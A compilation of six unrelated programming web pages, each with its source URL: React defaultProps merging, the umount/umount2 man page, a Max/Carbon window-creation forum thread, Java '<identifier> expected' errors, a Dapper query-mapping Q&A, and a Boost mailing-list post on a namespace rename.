React only does a shallow merge of the default props and the actual props, i.e. nested default props are overridden instead of merged. This is by design. See this React issue for more background, the reasoning why this is the case, and potential workarounds: "aside from the potential perf issues here, one issue with this is how do you handle nested complex structures like arrays? Concatenation? Union? What about an array of objects? Deep object merging can lead to unexpected behaviour, which is why implementations often allow you to specify a merge strategy, such as _.merge. I'm not sure how you would do that in a prop type declaration."
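The shallow-merge behaviour, and a common workaround (merging the nested object yourself inside the component), can be demonstrated with plain objects outside React. This is my own illustration; the object names are made up for the example:

```javascript
// Plain-object demonstration of the shallow merge React performs on
// defaultProps, plus a manual per-prop deep merge as a workaround.
const defaultProps = { test: { one: true, two: true } };
const appliedProps = { test: { one: false } };

// React's behaviour: only top-level keys are merged, so the whole
// nested `test` object is replaced and `two` is lost.
const shallow = Object.assign({}, defaultProps, appliedProps);
console.log(shallow.test.two); // undefined

// Workaround: spread the nested object yourself (e.g. in render()).
const merged = {
  ...defaultProps,
  ...appliedProps,
  test: { ...defaultProps.test, ...appliedProps.test },
};
console.log(merged.test.one, merged.test.two); // false true
```

In a component you would do the same per-prop merge in render(), or reach for a utility like _.merge if the structure is deeper.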
https://codedump.io/share/nYwGQJjFYxOW/1/reactcomponentdefaultprops-objects-are-overridden-not-merged
umount, umount2(2) - unmount a file system

#include <sys/mount.h>

int umount(const char *file);
int umount2(const char *file, int mflag);

The umount() function requests that a previously mounted file system contained on a block special device or directory be unmounted. The file argument is a pointer to the absolute pathname of the file system to be unmounted. After unmounting the file system, the directory upon which the file system was mounted reverts to its ordinary interpretation.

The umount2() function is identical to umount(), with the additional capability of unmounting file systems even if there are open files active. The mflag argument must contain one of the following values:

0
    Perform a normal unmount that is equivalent to umount(). The umount2() function returns EBUSY if there are open files active within the file system to be unmounted.

MS_FORCE
    Unmount the file system, even if there are open files active. A forced unmount can result in loss of data, so it should be used only when a regular unmount is unsuccessful. The umount2() function returns ENOTSUP if the specified file system does not support MS_FORCE. Only file systems of type nfs, ufs, pcfs, and zfs support MS_FORCE.

Upon successful completion, 0 is returned. Otherwise, -1 is returned and errno is set to indicate the error.

The umount() and umount2() functions will fail if:

ENOTSUP
    The file pointed to by file does not support this operation.

The umount() and umount2() functions can be invoked only by a process that has the {PRIV_SYS_MOUNT} privilege asserted in its effective set. Because it provides greater functionality, the umount2() function is preferred.
http://docs.oracle.com/cd/E26502_01/html/E29032/umount-2.html
trying to create windows

Hi,

I am currently trying to create and open a window in a Max external. The externals I had written for Max 4.6 used lots of windows, and I want to re-write them for Max 5. Other colleagues have already complained about the fact that t_wind is no longer available in Max 5. Now I am trying to use functions of the Carbon Window Manager to create and open a window.

First, I added Carbon.framework to the project (I am actually using the "minimum" project of the examples) and added

#include "MacWindows.h"

at the top of the minimum.c file (just below #include "ext.h"). In the minimum structure I declared a window reference:

WindowRef *myWindow;

and I added a function to create the window:

void CreateWindows (t_minimum *x)
{
    OSStatus err;
    Rect bounds;
    bounds.top = 50;
    bounds.left = 50;
    bounds.right = 550;
    bounds.bottom = 550;
    err = CreateNewWindow (1, 0, &bounds, x->myWindow);
    if (err) {
        post ("can't create window");
    } else {
        post ("new window created");
    }
}

I called this function from the *minimum_new function. In it, the Window Manager function CreateNewWindow should create the new window (the 1st parameter is the window class, the 2nd the window attributes, the 3rd the content bounds and the 4th the actual WindowRef). I pass the WindowRef x->myWindow from the minimum structure. I used err to indicate whether the window could be created or not. When I compile the project and open the external in Max 5, the creation of the window fails ("can't create window").
The strange thing is that I can create a window (and even open it) when I declare a local WindowRef inside this function:

void CreateWindows (t_minimum *x)
{
    OSStatus err;
    Rect bounds;
    WindowRef *myWindow;
    bounds.top = 50;
    bounds.left = 50;
    bounds.right = 550;
    bounds.bottom = 550;
    err = CreateNewWindow (1, 0, &bounds, myWindow);
    if (err) {
        post ("can't create window");
    } else {
        post ("new window created");
    }
    ShowWindow (*myWindow);
}

In this case, the external will create and open the window. Of course it doesn't make sense like this, since the WindowRef is local and there is no way to access the window any more after it has been created and opened. Why can't this function create the window when I pass it the WindowRef from the minimum structure (x->myWindow), and why will it create a window when I declare the WindowRef inside this function? I also tried declaring a global WindowRef at the top of the minimum.c file (not a member of the minimum structure), but CreateNewWindow won't create the window. Has anybody got an idea why this is the case?

Have you tried using kDocumentWindowClass for the first argument to CreateNewWindow()? That works for me. Also, I've never had any problems storing WindowRef pointers anywhere.

Davis

Thanks Davis, I have just tried it, unfortunately with the same (negative) result. It really shouldn't matter where I store the WindowRef! Hm... any idea? I attach the simplewindow.c file. Maybe someone can try it and tell me why it doesn't work.

I tried simplewindow.c with the Max 5 SDK, Mac OS 10.4.11, and Xcode 2.5. I commented out:

#include "MacWindows.h"

That file gets included automatically when I add Carbon.framework to the project. I noticed that your t_simplewindow struct did not contain a WindowRef, but a pointer to one. You need an actual WindowRef, and you pass the address of it to CreateNewWindow(). ShowWindow() is called upon successful window creation. Oh, and I added some window attributes.
For info on installing event handlers, try:

Anyway, I attached an altered version of simplewindow.c. I hope that gets you up and running.
Davis

Hi Davis, thanks a lot!!! It works now. That's great! I may come up with further questions some time later.
Rainer

Hi Davis, thanks again for your help. I have started to study the Carbon Event Manager to add event handling to my external (I still work with the simplewindow object to study basic things). I have defined event handlers for mouse and keyboard events and registered them with the window. Unfortunately these handlers seem to override the standard event handler that had been installed with the window attributes in CreateNewWindow(...), so now I can't drag the window with the mouse anymore. I thought that specifying event handlers would only override the events for which the handler is installed (in this case: the mouse-down, mouse-up and mouse-dragged events) and leave the other events to be processed by the standard event handler. How could I fix this? I enclose the simplewindow.c file again.
Thanks, Rainer

Your event handlers should return eventNotHandledErr if you want the default handlers to operate on the event. If you return anything other than eventNotHandledErr (like noErr), then event handling will stop for that event. I just changed all the lines in your code that look like this:

    return err;

to:

    return eventNotHandledErr;

That way, whenever you return from a handler, the default window handlers get to operate on the event. I see some colorful squares and triangles, and I am able to move/minimize/close the window. You should definitely prevent any window operations after the window is closed/destroyed. Or just don't allow the user to destroy the window; instead let them hide/un-hide it.
Good luck
Davis

Hi Davis, thanks very much for your kind help!!!
Rainer

It would be useful to know how to do this via Juce/Cycling's API, for cross-platform stuff, and since Carbon is being deprecated soon.
I hope it can be included in the API docs.
oli

I thought that huge chunks of Carbon were being deprecated, not Carbon as a whole. Though I wouldn't mind if Apple killed Carbon, as long as they provided us with a replacement that didn't require Objective-C. As for cross-platform development, I'm thinking about trying wxWidgets or Juce. But if what you're trying to do isn't directly related to the SDK, then the Cycling devs will most likely ignore your requests for help.
https://cycling74.com/forums/topic/trying-to-create-windows/
Error: identifier expected with System.out.println

Java's "<identifier> expected" compiler error means a statement or expression appears where the compiler expects a declaration. A classic trigger is calling a method directly in the class body:

    public class Test {
        System.out.println("This is a test.");   // error: <identifier> expected
    }

Executable statements must live inside a method, constructor, or initializer block, not at class level. Common causes and fixes:

- Missing semicolons at the ends of statements:

      System.out.println("Please enter your first name");
      System.out.println("Please enter your last name");

- Statements placed in the class body instead of a method. You can't call a method while declaring the attributes/methods of a class:

      public class ReadStateFile {
          Scanner kb = new Scanner(System.in);   // a field initializer is fine
          // System.out.println("ready");        // a bare statement here is not
      }

- Using a reserved word as an identifier. A line such as

      System.out.println("You threw a " + throw);

  produces "illegal start of expression" and "';' expected", because throw is a keyword and cannot be used as a variable name.

- Stray or unbalanced braces, which push later statements out of their method and back to class level, where the "<identifier> expected" message appears.

Note that System.out.println() (print-line) and System.out.print() are ordinary method calls for printing messages to the console, so they follow the same placement rules as any other statement.
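As a compilable before/after for the class-level-statement case (the class name and message here are made up for illustration):

```java
// A statement at class level triggers "<identifier> expected";
// moving it into a method fixes it.
public class Demo {
    // System.out.println("This is a test.");   // error: <identifier> expected

    public static void main(String[] args) {
        System.out.println("This is a test.");  // legal inside a method
    }
}
```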
http://geotecx.com/error-identifier-expected-system-out-println/
I'm extracting information from a SQL Server database using Dapper. The POCO for the information in question is below.

    public class Client
    {
        public string ShortName { get; set; }
        public string ContactDetail { get; set; }
        public string Street { get; set; }
        public string District { get; set; }
        public string Town { get; set; }
        public string County { get; set; }
        public string Postcode { get; set; }
    }

When I extract the information for the above object using the query below, all the information is mapped correctly apart from the following line:

    max(case when cd.Type = 1 OR cd.Type = 2 then cd.Detail end) as 'ContactDetail'

I believe this may be because I am not simply extracting the data from a table column; instead I am doing some processing with the CASE expression beforehand, and therefore Dapper cannot find the correct place to map the information onto. I thought including the AS clause would help Dapper find the correct mapping, but it didn't. How can I change my query so that Dapper maps the ContactDetail data correctly?

    select tp.ShortName as 'ShortName',
           max(case when cd.Type = 1 OR cd.Type = 2 then cd.Detail end) as 'ContactDetail',
           tp.Street,
           tp.District,
           tp.Town,
           tp.County,
           tp.PostCode
    ... (rest of query snipped as unneeded)

I know the query works correctly, as I can run it in SSMS and it returns the correct information.

Dapper doesn't have any interest in or knowledge of what is inside the query; it only cares about the shape of the results. So whatever is happening, it is part of the query. My hunches would be: null handling and null-coalescing, perhaps with the max complicating things.

Note that you can't just compare against SSMS output, because SSMS and ADO.NET (SqlClient) can have different SET option defaults, which can make significant yet subtle differences to some queries. To investigate it properly, I'd really need a reproducible example (presumably with fake data); without that, we're kinda guessing.
To reiterate, though: I strongly suspect that if you execute the same query via ExecuteReader or similar, you'll find that the value coming back in that position is indeed null (or DBNull).

I'm pretty sure the issue is that if you're using the object mapper in Dapper (i.e. passing Client as the generic type argument), then it will simply look for those columns in the matching table. The "ContactDetail" column does not exist (it's derived), so it will not find it. You have a couple of options here, depending on your data and use case:

1. Get the raw data from Dapper, and then use LINQ (or similar) to derive the ContactDetail using logic within the program.
2. Write a stored procedure based on your query, and use Dapper to run it.
3. Use Dapper's Query command to run your SQL statement, instead of trying to directly map the object.

Let me know if you get stuck on this, or require further explanation.
https://dapper-tutorial.net/knowledge-base/53396970/dapper-can-t-find-poco-mapping-from-select-case-query
Subject: Re: [boost] [1.48.0.beta 1][interprocess] detail namespace
From: Jan Boehme (jan.boehme_at_[hidden])
Date: 2011-10-28 07:27:22

On 10/28/2011 12:12 PM, Vicente J. Botet Escriba wrote:
> On 28/10/11 11:12, Jan Boehme wrote:
>> Hi,
>>
>> is the change of the name of the namespace 'detail' to 'ipcdetail'
>> intended to be in the release? Isn't it over-qualified, as it is located
>> in the namespace 'boost::interprocess' anyway? Btw, it breaks our
>> code and should be mentioned in the release notes of the library.
>>
> I guess that the detail namespace was not documented in the previous
> release. In this case the author has the freedom of changing any
> implementation detail. IMO, Ion has a good reason to do it, I'd bet.
>
> How is your code broken?

It's nothing dramatic. It's caused by the new name of this namespace and the use of some of its members in an extension. I wanted to have it confirmed, to make sure our adaptations can remain after an official 1.48 release. Our code must support various Boost versions, so we solved it using the pre-processor.

> Best,
> Vicente

Cheers,
Jan.

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2011/10/187323.php